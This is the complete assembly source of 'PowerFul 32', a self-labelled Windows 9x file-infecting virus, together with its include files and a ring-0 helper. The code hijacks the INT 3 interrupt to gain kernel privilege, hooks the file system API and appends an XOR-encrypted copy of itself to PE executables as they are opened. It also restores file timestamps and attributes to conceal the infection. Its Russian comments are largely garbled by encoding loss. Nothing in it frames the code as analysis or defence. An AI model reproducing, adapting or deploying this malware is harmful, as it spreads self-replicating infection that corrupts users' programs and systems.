[POWERFUL.ASM] include vmm.inc include ifs.inc include ifsmgr.inc ; ;। ⠭ TRUE = 1 FALSE = 0 DEBUG_INT1 = FALSE DEBUG_EXF = FALSE length_of_virus = offset(end_virus-start_virus) ; ; ᠬ p extrn ExitProcess:proc .386p .model flat .data db 0 .code start_virus: IF DEBUG_INT1 int 1h ENDIF pushad cld call init_virus init_virus: pop ebp sub ebp,offset(init_virus-start_virus) call open_RING0_function lea edi,[ebp+RING0_virus-start_virus] mov ax,03h int 3h mov ax,02h int 3h popad db 68h ;PUSH programm_RVA_with_IMAGEBASE: dd offset exit retn ; include ring0.asm ; already_in_memory: pop es ds retn RING0_virus: IF DEBUG_INT1 int 1h ENDIF push ds es mov eax,DR1 cmp eax,'DK32' jz already_in_memory ; p騪 db 0B0h ;MOV AL,00 crypt_byte label byte db 00h mov ecx,offset(end_crypt-start_crypt) lea esi,[ebp+start_crypt-start_virus] encrypt: xor byte ptr [esi],al inc esi loop encrypt ; p p start_crypt: call adjust_VXDCall push PAGECONTIG OR PAGEFIXED OR PAGEZEROINIT OR PAGEUSEALIGN push 00000000h push 00100000h push 00000000h push 00000000h push 00000000h push PG_SYS push 00000004h ;쪮 p p⠢ VXDCall_PageAllocate: int 20h dw _PageAllocate,VMM_DEVICE_ID add esp,20h or eax,eax jz already_in_memory ;EAX - p p mov edi,eax mov esi,ebp mov ecx,length_of_virus rep movsb ;DS:[ESI] -> ES:[EDI] mov esi,eax push eax add esi,offset(obr_IFSAPI-start_virus) push esi VXDCall_IFSMgr_InstallFileSystemApiHook: int 20h dw _InstallFileSystemApiHook,IFSMgr_Device_ID add sp,4 pop edi mov [edi+old_FSAPI-start_virus],eax mov eax,'DK32' mov DR1,eax jmp already_in_memory ; adjust_VXDCall: pushad mov ecx,number_of_entries_in_VXDCall_table lea esi,[ebp+VXDCall_table-start_virus] next_entry: push ecx lodsd add eax,ebp sub eax,offset start_virus mov edi,eax mov ecx,06h rep movsb ;DS:[ESI] -> ES:[EDI] pop ecx loop next_entry popad retn ; number_of_entries_in_VXDCall_table = 4 VXDCall_table: ;VXDCall _PageAllocate dd offset VXDCall_PageAllocate int 20h dw _PageAllocate,VMM_DEVICE_ID ;VXDCall IFSMgr_InstallFileSystemApiHook dd offset VXDCall_IFSMgr_InstallFileSystemApiHook int 20h dw _InstallFileSystemApiHook,IFSMgr_Device_ID ;VXDCall UniToBCSPath dd offset VXDCall_UniToBCSPath int 20h dw _UniToBCSPath,IFSMgr_Device_ID ;VXDCall IFSMgr_Ring0_FileIO dd offset VXDCall_IFSMgr_Ring0_FileIO int 20h dw _IFSMgr_Ring0_FileIO,IFSMgr_Device_ID ; p稪 IFSAPI obr_IFSAPI: pushad ;ESP-20h pushfd cld push ds es push ss ss pop es ds call init_obr_IFSAPI init_obr_IFSAPI: pop ebp sub ebp,offset(init_obr_IFSAPI-obr_IFSAPI) cmp byte ptr [ebp+busy_flag-obr_IFSAPI],01h jz virus_busy mov byte ptr [ebp+busy_flag-obr_IFSAPI],01h lea ebx,[esp+34h] cmp dword ptr ds:[ebx],24h ;p⨥ 䠩 jnz unbusy_virus_quit lea esi,[ebp+path_to_file-obr_IFSAPI] mov al,ds:[ebx+04h] ;H ᪠, ஬ ந室 (1 = A: .. 0ffh - UNC) cmp al,0FFh jz disk_not_present add al,40h mov ah,':' mov ss:[esi],ax add esi,2h disk_not_present: push 00 7Fh mov ebx,ds:[ebx+10h] ;⥫ 맮 IFS (IOREQ) mov eax,ds:[ebx+0Ch] ; ࠭, ன  ࠫ ᢮ ப ;BCS_ANSI = ANSI, BCS_OEM = OEM add eax,04h push eax push esi ;㤠 VXDCall_UniToBCSPath: int 20h dw _UniToBCSPath,IFSMgr_Device_ID add esp,10h cmp word ptr ds:[ebx+18h],01 jnz unbusy_virus_quit call void_attr jc unbusy_virus_quit call open_file jc set_attr_quit ;室: p HANDLE call asciiz ;室: p HANDLE call zaraza call close_file call set_time set_attr_quit: call set_attr unbusy_virus_quit: mov byte ptr [ebp+busy_flag-obr_IFSAPI],0 quit_obr_IFSAPI: pop es ds popfd popad db 0ffh,25h ;JMP [] old_FSAPI label dword dd 00000h virus_busy: mov ebx,esp push dword ptr [ebx+44h] call [ebx+30h] pop ecx mov [ebx+28h],eax cmp dword ptr [ebx+34h],24h jnz no_open_file mov eax,[ecx+28h] mov [ebp+time_date_of_file-obr_IFSAPI],eax mov [ebp+cell_for_rnd_number-obr_IFSAPI],eax no_open_file: pop es ds popfd popad retn ; zaraza: pushad cmp byte ptr [ebp+extention-obr_IFSAPI],0 jz exit_zaraza cmp byte ptr [ebp+filename-obr_IFSAPI],0 jnz exit_zaraza cmp byte ptr [ebp+filemask-obr_IFSAPI],1 jnz exit_zaraza IF DEBUG_INT1 int 1h ENDIF mov ecx,02h mov edx,3ch lea esi,[ebp+common_buffer-obr_IFSAPI] call read_file ;⠥ PE mov ecx,60h movzx edx,word ptr ds:[esi] mov dword ptr [ebp+PE_header_entrypoint-obr_IFSAPI],edx lea esi,[ebp+PE_header-obr_IFSAPI] call read_file cmp dword ptr [ebp+PE_header-obr_IFSAPI+58h],01010004h jz exit_zaraza mov dword ptr [ebp+PE_header-obr_IFSAPI+58h],01010004h ;⠥ ᫥ 쥪 movzx eax,word ptr [ebp+PE_header-obr_IFSAPI+06h] ;᫮ 쥪⮢ or eax,eax jz exit_zaraza dec eax mov ecx,40d mul ecx add eax,18h add ax,word ptr [ebp+PE_header-obr_IFSAPI+14h] ;+NT Header SIZE add eax,dword ptr [ebp+PE_header_entrypoint-obr_IFSAPI] push eax add eax,40d mov dword ptr [ebp+New_OBJ_entrypoint-obr_IFSAPI],eax pop edx lea esi,[ebp+last_WIN_object-obr_IFSAPI] call read_file cmp eax,ecx jnz exit_zaraza cmp dword ptr [ebp+last_WIN_object-obr_IFSAPI+4],'_piz' jz exit_zaraza ;Hp 쥪 xor edx,edx mov eax,length_of_virus-1 mov ecx,[ebp+PE_header-obr_IFSAPI+3Ch] ;FILE ALIGN cmp ecx,200h jb exit_zaraza div ecx inc eax mul ecx mov [ebp+New_OBJ-obr_IFSAPI+08h],eax ;VIRTUAL SIZE mov [ebp+New_OBJ-obr_IFSAPI+10h],eax ;PHYS SIZE mov eax,[ebp+last_WIN_object-obr_IFSAPI+0Ch] ;RVA ᫥ 쥪 add eax,[ebp+last_WIN_object-obr_IFSAPI+08h] ;VIRTUAL SIZE dec eax mov ecx,[ebp+PE_header-obr_IFSAPI+38h] ;Object ALIGN cmp ecx,200h jb exit_zaraza div ecx inc eax mul ecx mov [ebp+New_OBJ-obr_IFSAPI+0Ch],eax ;OBJECT RVA mov eax,R0_GETFILESIZE mov ebx,[ebp+file_handle-obr_IFSAPI] call VXDCall_IFSMgr_Ring0_FileIO push eax ; 䠩 mov edx,eax sub edx,04h mov ecx,04h lea esi,[ebp+common_buffer-obr_IFSAPI] call read_file pop eax cmp dword ptr [ebp+common_buffer-obr_IFSAPI],0 jnz exit_zaraza xor edx,edx push eax dec eax mov ecx,[ebp+PE_header-obr_IFSAPI+3Ch] ;FILE ALIGN div ecx inc eax mul ecx mov [ebp+New_OBJ-obr_IFSAPI+14h],eax ;PHYS OFFSET pop edx mov ecx,edx sub ecx,eax neg ecx cmp ecx,2000h jae exit_zaraza jcxz no_add_nul lea esi,[ebp+NUL_buffer-obr_IFSAPI] call clear_NUL_buffer call write_to_file no_add_nul: ;Hp PE header inc word ptr [ebp+PE_header-obr_IFSAPI+06h] ;p塞 p RVA mov eax,[ebp+PE_header-obr_IFSAPI+34h] ;IMAGE BASE add eax,[ebp+PE_header-obr_IFSAPI+28h] ;ENTRYPOINT RVA mov [ebp+programm_RVA_with_IMAGEBASE-obr_IFSAPI],eax ;⠢ RVA mov eax,[ebp+New_OBJ-obr_IFSAPI+0Ch] ;RVA 쥪 mov [ebp+PE_header-obr_IFSAPI+28h],eax ;NEW RVA ENTRYPOINT ;p㥬 IMAGE SIZE dec eax add eax,[ebp+New_OBJ-obr_IFSAPI+08h] ;VIRTUAL SIZE mov ecx,[ebp+PE_header-obr_IFSAPI+38h] ;OBJECT ALIGN xor edx,edx div ecx inc eax mul ecx mov [ebp+PE_header-obr_IFSAPI+50h],eax ;IMAGE SIZE ;襬 p call crypt_virus mov ecx,length_of_virus mov edx,[ebp+New_OBJ-obr_IFSAPI+14h] ;FHYS OFFSET lea esi,[ebp+NUL_buffer-obr_IFSAPI] call write_to_file ;뢠 饥 mov ecx,[ebp+New_OBJ-obr_IFSAPI+10h] sub ecx,length_of_virus add edx,length_of_virus lea esi,[ebp+NUL_buffer-obr_IFSAPI] call clear_NUL_buffer call write_to_file ;襬 PE_header mov ecx,60h mov edx,[ebp+PE_header_entrypoint-obr_IFSAPI] lea esi,[ebp+PE_header-obr_IFSAPI] call write_to_file ;襬 OBJ mov ecx,40d mov edx,[ebp+New_OBJ_entrypoint-obr_IFSAPI] lea esi,[ebp+New_OBJ-obr_IFSAPI] call write_to_file exit_zaraza: popad retn ; clear_NUL_buffer: pushad mov ecx,2000h lea edi,[ebp+NUL_buffer-obr_IFSAPI] xor al,al rep stosb popad retn ; crypt_virus: pushad mov ecx,length_of_virus lea esi,[ebp+start_virus-obr_IFSAPI] lea edi,[ebp+NUL_buffer-obr_IFSAPI] rep movsb ;DS:[ESI] -> ES:[EDI] new_crypt_number: call random_any_edx or dh,dh jz new_crypt_number mov [ebp+NUL_buffer-obr_IFSAPI+crypt_byte-start_virus],dh lea esi,[ebp+NUL_buffer-obr_IFSAPI+start_crypt-start_virus] mov ecx,offset(end_crypt-start_crypt) decrypt: xor [esi],dh inc esi loop decrypt popad retn ; ;室: p HANDLE 䠩 ; EBP - ⭮⥫ ; [path_to_file] - ":\ 䠩",0 ;室: p p: ; 1) filename ; 2) extention ; 3) filemask ;͸ ;p p 䠩: ; ;1) p ⮬ . pp 4,'ABCD' ; ;2) ⮬ ᠬ (訬 㪢) ; ;3) . p㣨 ; ;4) p祭 稢 ⮬ 0ffh ; filenames: ; db 0ffh ; - p ; ;͵ extentions: ; IF DEBUG_EXF ; db 04,'EXF',0 ; ELSE ; db 04,'EXE',0 ; ENDIF ; db 0ffh ; - p ; ;͵ ;ଠ: ;1) ᬥ饭 ᪨ ;2) 祢 ; 0 - (1) ᬥ饭 ᪨ ; 1 - 饭 p 䠩 (1) ;3) ᪨ ;4) ᪠: ; a) '?' -  ᫮ ; b) '*' -  ;5) p祭 稢 ᨬ 0ffh ;Ĵ filemasks: ; dw 003Ch ; Win32 App db 1,4,'PE',0,0 ; ;Ĵ db 0ffh ; - p ; ; asciiz: pushad cld ; 砫 ⤥ 䠩 lea esi,[ebp+path_to_file-obr_IFSAPI] mov edi,esi mov ecx,80h set_ebx_to_name: mov ebx,esi scan_name: lodsb ;DS:[ESI] (":\\ 䠩",0)-> AL cmp al,'\' jz set_ebx_to_name cmp al,'/' jz set_ebx_to_name cmp al,':' jz set_ebx_to_name or al,al jz filenames_check loop scan_name ; ;pp p filenames_check: mov esi,ebx lea edi,[ebp+filenames-obr_IFSAPI] ;pp p p ᪮쪨 p㣨 ;室: DS:[ESI] p p 㤥 p p p ; ES:[EDI] p p: ; db 6,'sergey' ; db 5,'misha' ; db 0ffh - p ;室: AL==0 - ᮢ ; AL!=0 - p ᮢ襩 p 稭 1' call cmps_string_with_databasestring mov byte ptr [ebp+filename-obr_IFSAPI],al ; ;pp p pp check_file_extention: seach_point: lodsb ;DS:[ESI] -> AL cmp al,'.' jz point_found or al,al jnz seach_point point_found: lea edi,[ebp+extentions-obr_IFSAPI] call cmps_string_with_databasestring mov byte ptr [ebp+extention-obr_IFSAPI],al or al,al jnz check_filemask jmp set_filemask_zero_exit ; ;pp p ᮪ check_filemask: lea edi,[ebp+filemasks-obr_IFSAPI] mov byte ptr [ebp+filemask-obr_IFSAPI],1 next_mask: push edi cmp byte ptr [edi],0ffh jz popedi_set_filemask_zero_exit cmp byte ptr [edi+2],0h jz no_win_check movzx edx,word ptr [edi] lea esi,[ebp+common_buffer-obr_IFSAPI] mov ecx,2h call read_file jc mask_failed movzx edx,word ptr [ebp+common_buffer-obr_IFSAPI] jmp read_and_check_mask no_win_check: movzx edx,word ptr [edi] ;⠥ pp塞 read_and_check_mask: ;室: EDX - 㤠 movzx ecx,byte ptr [edi+3] lea esi,[ebp+common_buffer-obr_IFSAPI] call read_file jc mask_failed add edi,4h next_letter_of_mask: cmp byte ptr [edi],'*' jz next_letter cmp byte ptr [edi],'?' jnz letter_is_not_q cmp byte ptr [esi],30h jb mask_failed cmp byte ptr [esi],39h ja mask_failed next_letter: inc edi inc esi loop next_letter_of_mask jmp mask_coincide letter_is_not_q: cmpsb ;p DS:[SI] ES:[DI] jnz mask_failed loop next_letter_of_mask ; ᪠ mask_coincide: pop edi jmp exit_Asciiz ;᪠ ᮢ mask_failed: pop edi add edi,3h movzx ecx,byte ptr [edi] add edi,ecx inc edi inc byte ptr [ebp+filemask-obr_IFSAPI] jmp next_mask popedi_set_filemask_zero_exit: pop edi set_filemask_zero_exit: mov byte ptr [ebp+filemask-obr_IFSAPI],0 exit_Asciiz: popad retn ; ;pp p p ᪮쪨 p㣨 ;室: [ESI] p p 㤥 p p p ; [EDI] p p: ; db 6,'sergey' ; db 5,'misha' ; db 0ffh - p ;室: AL==0 - ᮢ ; AL!=0 - p ᮢ襩 p cmps_string_with_databasestring: push edi ecx cld xor ecx,ecx mov al,01h next_string: push esi edi mov cl,[edi] cmp cl,0ffh jz no_coincide_string inc edi rep cmpsb ; p DS:[ESI] ES:[EDI] pop edi esi jz coincide_string mov cl,[edi] add edi,ecx inc edi inc al jmp next_string coincide_string: pop ecx edi retn no_coincide_string: pop edi esi ecx edi xor al,al retn ; set_time: pushad mov eax,4303h mov ecx,[ebp+time_date_of_file-obr_IFSAPI] mov edi,[ebp+time_date_of_file-obr_IFSAPI+2] lea esi,[ebp+path_to_file-obr_IFSAPI] call VXDCall_IFSMgr_Ring0_FileIO popad retn void_attr: pushad mov ax,R0_FILEATTRIBUTES OR GET_ATTRIBUTES lea esi,[ebp+path_to_file-obr_IFSAPI] call VXDCall_IFSMgr_Ring0_FileIO jc exit_void_attr mov [ebp+file_attribute-obr_IFSAPI],ecx mov ax,R0_FILEATTRIBUTES OR SET_ATTRIBUTES xor ecx,ecx call VXDCall_IFSMgr_Ring0_FileIO exit_void_attr: popad retn set_attr: pushad mov ax,R0_FILEATTRIBUTES OR SET_ATTRIBUTES mov ecx,[ebp+file_attribute-obr_IFSAPI] lea esi,[ebp+path_to_file-obr_IFSAPI] call VXDCall_IFSMgr_Ring0_FileIO popad retn open_file: pushad mov eax,R0_OPENCREATFILE xor ecx,ecx mov ebx,ACCESS_READWRITE mov edx,ACTION_OPENEXISTING lea esi,[ebp+path_to_file-obr_IFSAPI] call VXDCall_IFSMgr_Ring0_FileIO mov [ebp+file_handle-obr_IFSAPI],eax popad retn ;p 䠩 close_file: pushad mov eax,R0_CLOSEFILE mov ebx,[ebp+file_handle-obr_IFSAPI] call VXDCall_IFSMgr_Ring0_FileIO popad retn ;室: ECX - ᪮쪮 p ; EDX - 㤠 p ; ESI - 㤠 read_file: push ebx mov eax,R0_READFILE mov ebx,[ebp+file_handle-obr_IFSAPI] call VXDCall_IFSMgr_Ring0_FileIO pop ebx retn ;室: ECX - ᪮쪮 ; EDX - 㤠 ; ESI - write_to_file: pushad mov eax,R0_WRITEFILE mov ebx,[ebp+file_handle-obr_IFSAPI] call VXDCall_IFSMgr_Ring0_FileIO popad retn ; VXDCall_IFSMgr_Ring0_FileIO: int 20h dw _IFSMgr_Ring0_FileIO,IFSMgr_Device_ID retn ; random_any_edx: mov edx,0fffffffeh random_edx: push eax ebx edx call init_rnd_proc cell_for_rnd_number dd 0100h init_rnd_proc: pop ebx imul eax,dword ptr [ebx],4dh inc eax mov dword ptr [ebx],eax pop ebx inc ebx xor edx,edx or ebx,ebx jz quit_from_rnd div ebx ;EDX:EAX / EBX -> EAX:EDX quit_from_rnd: pop ebx eax retn ; New_OBJ: db '.text',0,0,0 ;! p , pp ⮩ ;ᥪ樨 p 8. dd 00000000h,00000000h ;VIRTUAL SIZE RVA 쥪 dd 00000000h,00000000h ;PHYS SIZE PHYS OFFSET dd 00000000h,00000000h ;RESERVED RESERVED dd 00000000h,60000020h ;RESERVED OBJECT FLAGS ; db "PowerFul 32 v1.1 (c) DK and /5" end_crypt: end_virus: ; busy_flag db 0 file_handle dd 0 file_attribute dd 0 time_date_of_file dd 0 ;0, ᫨ p FILENAMES ᮢ. ; p p ᮢ襣 . filename db 0 ;0, ᫨ pp p extentions ᮢ. ; p p ᮢ襣 pp. extention db 0 ; 砥, ᫨ extention=0, ᪨ pp ;0, ᫨ ᪠ p filemasks ᮢ. ; p p ᮢ襩 ᪨. filemask db 0 ;PE PE_header db 060h dup (0) ;᫥ WIN 쥪 last_WIN_object db 040d dup (0) ;㤠 㤥 PE PE_header_entrypoint dd 0 ;㤠 㤥 쥪 New_OBJ_entrypoint dd 0 path_to_file db 200h dup (0) common_buffer db 100h dup (0) NUL_buffer: ; exit: push 0 call ExitProcess end start_virus [POWERFUL.ASM] [VMM.INC] VMM_DEVICE_ID EQU 00001H _HeapAllocate EQU 0004Fh HEAPZEROINIT EQU 00000001H HEAPZEROREINIT EQU 00000002H HEAPNOCOPY EQU 00000004H HEAPLOCKEDIFDP EQU 00000100H HEAPSWAP EQU 00000200H HEAPINIT EQU 00000400H HEAPCLEAN EQU 00000800H _PageAllocate EQU 00053h _PageReAllocate EQU 00054h _PageGetAllocInfo EQU 00059h _GetFreePageCount EQU 0005Ah _GetSysPageCount EQU 0005Bh PAGEZEROINIT EQU 00000001H PAGEUSEALIGN EQU 00000002H PAGECONTIG EQU 00000004H PAGEFIXED EQU 00000008H PAGEDEBUGNULFAULT EQU 00000010H PAGEZEROREINIT EQU 00000020H PAGENOCOPY EQU 00000040H PAGELOCKED EQU 00000080H PAGELOCKEDIFDP EQU 00000100H PAGESETV86PAGEABLE EQU 00000200H PAGECLEARV86PAGEABLE EQU 00000400H PAGESETV86INTSLOCKED EQU 00000800H PAGECLEARV86INTSLOCKED EQU 00001000H PAGEMARKPAGEOUT EQU 00002000H PAGEPDPSETBASE EQU 00004000H PAGEPDPCLEARBASE EQU 00008000H PAGEDISCARD EQU 00010000H PAGEPDPQUERYDIRTY EQU 00020000H PAGEMAPFREEPHYSREG EQU 00040000H PAGENOMOVE EQU 10000000H PAGEMAPGLOBAL EQU 40000000H PAGEMARKDIRTY EQU 80000000H PG_SYS EQU 1 PG_RESERVED1 EQU 2 PG_PRIVATE EQU 3 PG_RESERVED2 EQU 4 PG_RELOCK EQU 5 PG_INSTANCE EQU 6 PG_HOOKED EQU 7 PG_IGNORE EQU 0FFFFFFFFH _PageReserve EQU 0011Dh _PageCommit EQU 0011Eh PR_PRIVATE EQU 80000400H PR_SHARED EQU 80060000H PR_SYSTEM EQU 80080000H PR_FIXED EQU 00000008H PR_4MEG EQU 00000001H PR_STATIC EQU 00000010H PD_ZEROINIT EQU 00000001H PD_NOINIT EQU 00000002H PD_FIXEDZERO EQU 00000003H PC_FIXED EQU 00000008H PC_LOCKED EQU 00000080H PC_LOCKEDIFDP EQU 00000100H PC_WRITEABLE EQU 00020000H PC_USER EQU 00040000H PC_INCR EQU 40000000H PC_PRESENT EQU 80000000H PC_STATIC EQU 20000000H PC_DIRTY EQU 08000000H [VMM.INC] [IFS.INC] R0_OPENCREATFILE equ 0D500h ; Open/Create a file R0_OPENCREAT_IN_CONTEXT equ 0D501h ; Open/Create file in current context R0_READFILE equ 0D600h ; Read a file, no context R0_WRITEFILE equ 0D601h ; Write to a file, no context R0_READFILE_IN_CONTEXT equ 0D602h ; Read a file, in thread context R0_WRITEFILE_IN_CONTEXT equ 0D603h ; Write to a file, in thread context R0_CLOSEFILE equ 0D700h ; Close a file R0_GETFILESIZE equ 0D800h ; Get size of a file R0_FINDFIRSTFILE equ 04E00h ; Do a LFN FindFirst operation R0_FINDNEXTFILE equ 04F00h ; Do a LFN FindNext operation R0_FINDCLOSEFILE equ 0DC00h ; Do a LFN FindClose operation R0_FILEATTRIBUTES equ 04300h ; Get/Set Attributes of a file R0_RENAMEFILE equ 05600h ; Rename a file R0_DELETEFILE equ 04100h ; Delete a file R0_LOCKFILE equ 05C00h ; Lock/Unlock a region in a file R0_GETDISKFREESPACE equ 03600h ; Get disk free space R0_READABSOLUTEDISK equ 0DD00h ; Absolute disk read R0_WRITEABSOLUTEDISK equ 0DE00h ; Absolute disk write ACCESS_MODE_MASK equ 00007h ; Mask for access mode bits ACCESS_READONLY equ 00000h ; open for read-only access ACCESS_WRITEONLY equ 00001h ; open for write-only access ACCESS_READWRITE equ 00002h ; open for read and write access ACCESS_EXECUTE equ 00003h ; open for execute access ACTION_MASK equ 0ffh ; Open Actions Mask ACTION_OPENEXISTING equ 001h ; open an existing file ACTION_REPLACEEXISTING equ 002h ; open existing file and set length ACTION_CREATENEW equ 010h ; create a new file, fail if exists ACTION_OPENALWAYS equ 011h ; open file, create if does not exist ACTION_CREATEALWAYS equ 012h ; create a new file, even if it exists GET_ATTRIBUTES equ 0 ; get attributes of file/dir SET_ATTRIBUTES equ 1 ; set attributes of file/dir [IFS.INC] [IFSMGR.INC] IFSMgr_Device_ID EQU 00040h _InstallFileSystemApiHook EQU 00067h _UniToBCSPath EQU 00041h _IFSMgr_Ring0_FileIO EQU 00032h [IFSMGR.INC] [RING0.ASM] ; ; ۿ ۿ ۿ ۿ ۿ ۿ ; IJ IJ ; ڱ ; ڰ ٰ ; ; ; ; open_RING0_function: pushad call init_open_RING0_function init_open_RING0_function: pop ebp sub ebp,offset (init_open_RING0_function-open_RING0_function) sub esp,4 sidt fword ptr [esp-02] ; p IDT pop ebx add ebx,3*8h cli ;p p p稪 pp뢠 INT 3 mov edi,[ebx+4] mov di,[ebx] ;H p稪 INT 3 lea esi,[ebp+obr_INT3-open_RING0_function] mov [ebx],si ;p ᬥ饭 p稪 INT3 shr esi,10h mov [ebx+06],si ;p ᬥ饭 p稪 INT3 ;室: EDI - p p稪 ; EBX - p pp INT 3 mov ax,01h int 3h popad retn ; ;騥 㭪樨: ;AX = 1 - 樠 RING0_function ;室: EDI - p p稪 ; EBX - p pp INT 3 ;AX = 2 - p p稪 㭪権 RING3 (p 室) ;AX = 3 - 믮 pp RING 0 ;室: EDI - ᬥ饭 pp obr_INT3: push ebp call init_obr_INT3 init_obr_INT3: pop ebp sub ebp,offset (init_obr_INT3-obr_INT3) ; p ᢮ 㭪樨 RING0 cmp ax,01h ;樠 㭪権 RING0 ( ᯮ짮) jz init_RING0_function cmp ax,02h ;Remove RING 0 㭪権 jz remove_RING0_function cmp ax,03h jz call_RING0 function_complite: pop ebp function_complite_without_popebp: iretd init_RING0_function: mov dword ptr [ebp+old_IN3_base_addr-obr_INT3],edi mov dword ptr [ebp+IDT_base_addr-obr_INT3],ebx jmp function_complite remove_RING0_function: push ebx esi mov ebx,dword ptr [ebp+IDT_base_addr-obr_INT3] mov esi,dword ptr [ebp+old_IN3_base_addr-obr_INT3] mov [ebx],si shr esi,10h mov [ebx+06],si pop esi ebx jmp function_complite call_RING0: pop ebp call edi jmp function_complite_without_popebp old_IN3_base_addr dd 0 IDT_base_addr dd 0 ; [RING0.ASM]